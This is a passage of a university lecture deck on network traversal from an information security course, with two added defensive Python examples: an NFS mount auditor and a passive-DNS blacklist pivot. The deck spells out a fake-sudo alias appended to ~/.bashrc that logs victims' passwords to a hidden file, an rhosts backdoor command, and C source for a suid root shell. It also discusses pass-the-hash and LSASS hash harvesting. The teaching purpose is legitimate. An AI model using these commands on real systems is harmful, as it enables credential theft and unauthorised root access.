Network Traversal


Introduction to Information Security
Network Traversal
nirkrako at post.tau.ac.il
itamargi at post.tau.ac.il
Network Traversal Introduction
• We now move from hacking a single machine or device to traversing an entire network:
o How organized networks are structured.
o How hackers penetrate organized networks, which are usually administered by a single person or a team of administrators.
o How hackers traverse the network to gain access to more resources and data.
[Figure: Victim Network, with arrows labelled Vertical and Horizontal/Lateral]
First Target: Patient 0
• Hackers will try to infect one computer by different methods:
o Chance / statistical luck!
o Spear-phishing or human error.
o Social engineering.
o Pure hacking.
• After infecting patient 0, hackers can launch different types of attacks, which now depend on the internal network structure.
• Using the information and access readily available on the hacked machine, hackers can attempt to traverse the network laterally.
Spearphishing
• “Spear phishing is an e-mail spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. Spear phishing attempts are not typically initiated by "random hackers" but are more likely to be conducted by perpetrators out for financial gain, trade secrets or military information.” - http://searchsecurity.techtarget.com/definition/spear-phishing
An email I received
• True story: I received this email last year. Can you
spot the fail?
Network-wide Users
• In an organized network, each user is given a single user/password credential; this password is used to authenticate the user against all machines in the network which the user should have access to.
• Example: TAU. Your user and password are used to log in to the *nix machines as well as the video website.
• If a computer used by one of the users is compromised, the credentials captured there can be used to log in to every machine in the network that user has access to.
Sniffing for passwords
By local example (append an alias to the victim's ~/.bashrc so that "sudo" runs our wrapper, which records the password and then forwards it to the real sudo):
cat >> ~/.bashrc << '__EOF__'
alias sudo='/tmp/sudo.sh'
__EOF__
cat > /tmp/sudo.sh << '__EOF__'
#!/bin/bash
# fake sudo: prompt, log the password, then hand it to the real sudo via -S so the
# victim is not prompted a second time
printf 'Enter password: '
read -rs PASS
echo
printf '%s\n' "$PASS" >> /tmp/.password.log
printf '%s\n' "$PASS" | command sudo -S "$@"
__EOF__
chmod +x /tmp/sudo.sh
Sniffing for passwords
• On Windows and in other GUI-based applications: key logging is used to record credentials as they are typed.
• By actually sniffing the network, looking for telnet or other unencrypted protocols, where passwords are sent in clear text.
• Sniffing the network traffic looking for hashes, which can later be cracked (more in the next slide).
Cracking passwords
• Root access gives us /etc/shadow (historically the hashes lived in the world-readable /etc/passwd), which contains the password hashes.
• John the Ripper or other password brute-forcing tools can then be used to recover the clear-text password.
• The clear-text password can be used to log in to other computers.
• Users tend to use the same password for all computers and services, making it easy to gain access to other resources.
rlogin/rsh - history
• Instead of logging in every time, rlogin/rsh authenticate a user without the need to enter a password.
• Once a connection is received from a trusted machine (listed in /etc/hosts.equiv or the user's ~/.rhosts) and the client declares which user is remotely connecting, that user automatically gains access to the remote machine with the same credentials.
• Many hacking techniques employ:
o echo "+ +" > ~root/.rhosts
o This lets anybody, from any host, connect to the computer as root.
• IP spoofing can be used to gain remote access as well, and this poor authentication is still being used in some dark corners of the world.
• NFS versions before 4 rely on the same bad authentication (AUTH_SYS, the sec=sys mount option): the client asserts the caller's UID/GID, and the server only checks the source host and, at best, that the source port is privileged.
Domain of computers
Unix NIS (Network Information Service)
• NIS (formerly known as Yellow Pages/YP) is an old protocol used to sync accounts and passwords across a network.
• The NIS passwd map is used to distribute the credentials of a whole network of computers.
• Every client in the network is given access to shared maps that correspond to files such as passwd, shadow, group, etc.
• By using the shell: # ypcat passwd
o You can get the network password hashes of ALL users!
o In a secure network scheme this does not include the root account; however, local account access can be gained on every computer sharing the passwd map.
Pass the hash
• Pass the hash exploits NTLM, the original Windows SSO (Single Sign On) authentication: the challenge-response only ever needs the NT hash, never the clear-text password, so the hash alone is enough to authenticate.
• In Windows-based systems, by simply passing the hash, a user is able to prove that he has the credentials needed to gain access to a resource (such as a network share).
• Once hackers log in to a system, they can take the hashes already present locally and pass them to other systems by this process:
o Gain local administrator privileges.
o View the locally logged-in accounts.
o Impersonate a user locally (inject the harvested hash into a logon session).
o Use regular Windows operations to access network resources.
o Gain more access and run remote code using psexec (Sysinternals utility).
LSASS
• Slide taken from “WCE Internals” by Amplia Security.
Hash harvesting
• On Windows computers, hashes are kept in LSASS memory for logged-on users and are cached locally even after a logon session is terminated, so that logon still works when the domain is no longer reachable.
• Several tools in the wild are used to do this hash harvesting, such as:
o WCE – Windows Credential Editor
o Pass The Hash Toolkit
o gsecdump
o pwdump – hash dumping is also possible locally by dumping the SAM file (Security Accounts Manager)
o Maybe more.
• WCE and its like:
o Use ReadProcessMemory() to read the memory of LSASS for harvesting.
o Inject code to implement the impersonation of users.
• Side note – cracking NTLM hashes:
o The DES-based scheme described here is the old LM (LAN Manager) hash: the password is upper-cased and padded/truncated to 14 bytes, and each 7-byte half is used separately as a DES key, so instead of 256^14 an attacker faces only 2 * 256^7 (far fewer in practice, since case is lost). Therefore a rainbow table can be easily created.
o The NT hash that replaced it (the one NTLM and pass the hash actually use) is an unsalted MD4 of the UTF-16LE password; it has no 14-byte limit, but being unsalted it is just as amenable to precomputed tables.
Unix NFS (Network File System)
• Unix NFS is comparable to Windows “Sharing”: a method of sharing directories by allowing others to mount a remote directory locally as if it were their own.
• As we previously learned, a root-owned file with u+s and o+x set hands us root privileges when executed, so we are able to escalate our privileges:
o printf '%s\n' '#include <unistd.h>' '#include <stdlib.h>' 'int main(){setuid(0);setgid(0);system("/bin/sh");return 0;}' > a.c
o gcc -o a a.c
o chown root a; chmod u+s,o+x a (done on the machine where we already are root)
• Misconfigured NFS allows a mounted directory to contain suid files, therefore allowing root on one machine to gain root on every other machine that mounts the same export without nosuid (and with root_squash off on the server).
o http://packetstorm.wowhacker.com/mag/faith/faith8.txt
Shared binaries patching
• Administrators or users share binaries on network shares / NFS (usually installation files).
• If those network shares are writable by a hacker, he can modify (patch) the binaries and then wait for other users to execute them.
• Example at TAU (the root filesystem itself is an NFS export, mounted rw with sec=sys):
user@nova:~$ mount | grep '/ type'
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)
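An added example (not from the slides) that turns the two NFS slides into a check: it parses `mount` output in the format shown above and reports, per NFS mount, the options that enable the suid trick and the shared-binary patching (rw, missing nosuid/noexec, sec=sys). The first sample line is the TAU line from the slide re-joined onto one line; the other lines and the hardened export are constructed for contrast.

```python
import re

# "<source> on <mount point> type <fstype> (<comma separated options>)"
MOUNT_RE = re.compile(r"^(?P<src>\S+) on (?P<mp>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$")

# Constructed sample `mount` output; line 1 is the slide's own example.
SAMPLE_MOUNT = """\
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)
fileserver:/software on /opt/software type nfs4 (ro,nosuid,nodev,noexec,relatime,vers=4.1,sec=krb5p,addr=192.0.2.20)
fileserver:/home on /home type nfs (rw,nosuid,nodev,relatime,vers=3,sec=sys,addr=192.0.2.20)
tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec,relatime,size=812000k,mode=755)
"""


def audit_nfs_mounts(mount_output):
    """Return {mount_point: [issue, ...]} for every NFS mount in `mount` output.

    writable      mounted rw: whoever can write to the export can plant or patch
                  binaries that other hosts execute
    suid-allowed  no nosuid: a root-owned setuid file on the export is root on
                  every client mounting it
    exec-allowed  no noexec (the root filesystem is exempt, it cannot be noexec):
                  binaries on the share run directly
    auth-sys      sec=sys (or no sec= at all, which defaults to it): the server
                  trusts the UID/GID the client asserts
    """
    findings = {}
    for line in mount_output.splitlines():
        m = MOUNT_RE.match(line.strip())
        if not m or not m.group("fstype").startswith("nfs"):
            continue
        opts = set(m.group("opts").split(","))
        mp = m.group("mp")
        issues = []
        if "rw" in opts:
            issues.append("writable")
        if "nosuid" not in opts:
            issues.append("suid-allowed")
        if "noexec" not in opts and mp != "/":
            issues.append("exec-allowed")
        if "sec=sys" in opts or not any(o.startswith("sec=") for o in opts):
            issues.append("auth-sys")
        findings[mp] = issues
    return findings


if __name__ == "__main__":
    for mp, issues in audit_nfs_mounts(SAMPLE_MOUNT).items():
        print(f"{mp}: {', '.join(issues) or 'ok'}")
```

Mount options say what the client will honour, not who can write: whether the hacker can actually modify a shared installer is a question of file permissions on the export (`find /opt/software -perm -o+w` on the client is the usual next step), and a ro mount on one client does not stop a different client from mounting the same export rw.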
More Misc Subjects
• Network based anti-viruses
• Passive DNS
Network based antiviruses
• Network anti-viruses aim to catch malware at the endpoints by analyzing aspects of its network traffic.
• Companies that provide this service reverse engineer malware and collect intelligence on how the malware operates from a network perspective.
• The intelligence is turned into blacklist rules such as:
o Command and control domains
o Command and control IPs
o Specific-looking URLs (URL patterns)
Passive DNS
• Security researchers have been collecting IP-host pairs for a few years now.
• This is done using instrumented programs installed by ISPs at their DNS resolvers, which record the answers the resolvers see.
• The host-IP pairs can be used to back-track hackers' resources.
• For example, if hacker A uses the domain blblbfizzly.com, we can now blacklist it.
• We look it up in passive DNS to find its IP pairs and find it matches the following IPs: 8.8.8.8 and 8.8.4.4.
• We look up the same database for pairs with 8.8.4.4 and find it matches gogogofizzly.com and bijo888rocks.com.
• Now, without much more information, you would make an educated guess that gogogofizzly.com is being used by the same hacker A; therefore we can blacklist it too.
• Caveat: the pivot is only meaningful through IPs dedicated to the attacker. An IP shared by many unrelated domains (a CDN, a shared host, or a well-known public service address such as the Google Public DNS addresses used in this toy example) would drag innocent domains onto the blacklist.
• Virustotal.com has a publicly queryable passive DNS database, but it is an incomplete one.
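An added example (not from the slides) that carries the pivot through in code and then applies the resulting blacklist to proxy log lines, in the spirit of the network anti-virus slide. The passive-DNS records, the log lines and the URL rule are constructed; the IPs are RFC 5737 documentation addresses rather than the public-resolver addresses of the slide's toy example, and `max_fanout` is an assumed threshold that stops a shared IP from pulling unrelated domains onto the blacklist.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed passive-DNS observations (domain, ip); not real data.
PDNS = [
    ("blblbfizzly.com", "203.0.113.10"),
    ("blblbfizzly.com", "203.0.113.11"),
    ("gogogofizzly.com", "203.0.113.11"),
    ("bijo888rocks.com", "203.0.113.11"),
    ("bijo888rocks.com", "198.51.100.7"),   # also parked on a shared host ...
    ("shop-example.com", "198.51.100.7"),   # ... together with unrelated tenants
    ("blog-example.org", "198.51.100.7"),
    ("mail-example.net", "198.51.100.7"),
    ("news-example.com", "198.51.100.7"),
]


def pivot(seed, pdns, max_fanout=3):
    """Expand a seed domain to every domain reachable through shared IPs.

    An IP seen with more than `max_fanout` domains is treated as shared
    infrastructure (CDN, hosting, public resolver) and is not pivoted through.
    Returns (domains, ips) accepted onto the blacklist.
    """
    dom2ip, ip2dom = defaultdict(set), defaultdict(set)
    for d, ip in pdns:
        dom2ip[d].add(ip)
        ip2dom[ip].add(d)
    domains, ips, queue = {seed}, set(), [seed]
    while queue:
        d = queue.pop()
        for ip in dom2ip[d]:
            if ip in ips or len(ip2dom[ip]) > max_fanout:
                continue
            ips.add(ip)
            for nd in ip2dom[ip]:
                if nd not in domains:
                    domains.add(nd)
                    queue.append(nd)
    return domains, ips


# Constructed proxy log lines: "<timestamp> <client> <method> <url> <status>".
LOG_RE = re.compile(r"^(\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 GET http://www.example.com/index.html 200
2024-05-01T10:00:02Z 10.0.0.5 POST http://gogogofizzly.com/gate.php 200
2024-05-01T10:00:03Z 10.0.0.9 POST http://203.0.113.10/upload 200
2024-05-01T10:00:04Z 10.0.0.9 GET http://cdn-example.net/x/gate.php?id=deadbeef 404
2024-05-01T10:00:05Z 10.0.0.7 GET http://shop-example.com/cart 200
"""
# A "specific-looking URL" rule of the kind derived from malware analysis (constructed).
URL_RULES = [re.compile(r"/gate\.php\?id=[0-9a-f]{8}$")]


def match_log(log_text, domains, ips, url_rules=URL_RULES):
    """Return [(client, host, reason)] for every log line that hits the blacklist."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        host = urlsplit(url).hostname or ""
        if host in domains:
            reason = "c2-domain"
        elif host in ips:
            reason = "c2-ip"
        elif any(r.search(url) for r in url_rules):
            reason = "c2-url-pattern"
        else:
            continue
        hits.append((m.group("src"), host, reason))
    return hits


if __name__ == "__main__":
    domains, ips = pivot("blblbfizzly.com", PDNS)
    print("blacklist:", sorted(domains), sorted(ips))
    for client, host, reason in match_log(SAMPLE_LOG, domains, ips):
        print(f"{client} -> {host}: {reason}")
```

Rerunning `pivot` with a large `max_fanout` pulls the four unrelated tenants of 198.51.100.7 onto the blacklist, and the shop-example.com line in the log then becomes a false alarm; the threshold, plus first-seen/last-seen timing when the database provides it, is what keeps the pivot honest.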
Random Practical Subjects
Not Covered
• Honey pots
o File based
o Computer based
o Network based
• Penetration testing
o Metasploit
o Nessus
• SIEM/SOC Systems
o Sinkholes.
• Security Resources:
o CVE
o Virustotal
• Security Patches
o 0-Day Gap.
• Command and Control Channels
• Many more…
Questions?
Good Luck in the Test!
• The test is hard.
• You will need to prepare a folder with this semester's material and bookmarks for the subjects!
• Hopefully, there will be a 3-hour rehearsal exercise before the test.
• Feel free to drop by with questions and ask for help.
• No homework for you; come back in 1 year!